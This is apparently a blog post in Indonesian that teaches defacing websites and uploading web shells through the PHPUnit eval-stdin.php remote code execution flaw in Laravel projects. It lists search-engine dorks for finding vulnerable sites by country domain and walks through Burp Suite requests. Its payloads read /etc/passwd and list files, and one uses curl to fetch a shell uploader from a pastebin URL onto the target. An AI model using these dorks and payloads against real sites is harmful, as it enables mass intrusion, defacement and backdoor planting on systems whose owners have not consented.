Laravel PHPUnit Remote Code Execution

Laravel PHPUnit RCE : Oke Disini gua bakal coba share ke kalian cara Deface atau upload shell menggunakan Poc RCE Laravel, sebenernya poc ini sudah amat banyak yang menggunakan sehingga saya sendiri mencari poc ini pada web web luar tidak dapat kadang sudah ada yang di patch sama defacer lain, disini path vuln nya terletak pada bagian eval-stdin.php dan
Celah ini sebenarnya terletak pada vendor third party yakni PHPUnit. daripada lama coba langsung saja saya kasih bahan bahannya

Alat Tempur :
~ Path Vuln : eval-stdin.php
~ Dork         : inurl:/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
NIH BONUS -_-  Selebihnya Mikir pake otak mesum kalian
  • 'inurl:/Util/PHP/ site:.id'
  • 'inurl:/phpunit/phpunit/ site:.com'
  • 'inurl:/vendor/bin/ site:'
  • 'inurl:/vendor/phpunit'
  • 'inurl:/vendor/phpunit/phpunit/src/Util/PHP/ site:.net'
  • 'intitle:"index of" intext:eval-stdin.php site:za'
  • 'inurl:/Util/PHP/ intext:eval-stdin.php site:.com'

~ Full Path : https://www.target.co.li/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php


Disini saya coba melakukan Pentesting security menggunakan BurpSuite,  jika belum download BurpSuite Bisa Klik Disini Untuk Mendownloadnya download

jika sudah download silahkan buka
dan coba atur proxy agar bisa akses ke burpsuitenya jika tidak paham silahkan cek video tutorial di yt kami









Cara pertama
1. Intercept, lalu kirim requestnya ke repeater.



Lalu klik menu Repeater, masukkan payloadnya dibawah, dan klik tombol Go.

Code Exploit : <?php system('tail /etc/passwd'); ?>
                        <?php system('ls'); ?> (Ini Untuk Melihat File Di Path Tersebut)
                       <?php system('pwd'); ?>  (Untuk Melihat Path)
                        <?php system('ls; curl -O https://pastebin.com/raw/NBeTiCH9'); ?> (Ini Buat Upload Shell Kalian Tapi Ini Gua Pake Script Uploader)

Untuk responnya bisa dilihat di sebelah kolom request (sebelah kanan).

Oke mungkin itu saja tutorial kali ini, sekian dan semoga bermanfaat.
silahkan liat video tutorialnya :)

0 Comments:

Post a Comment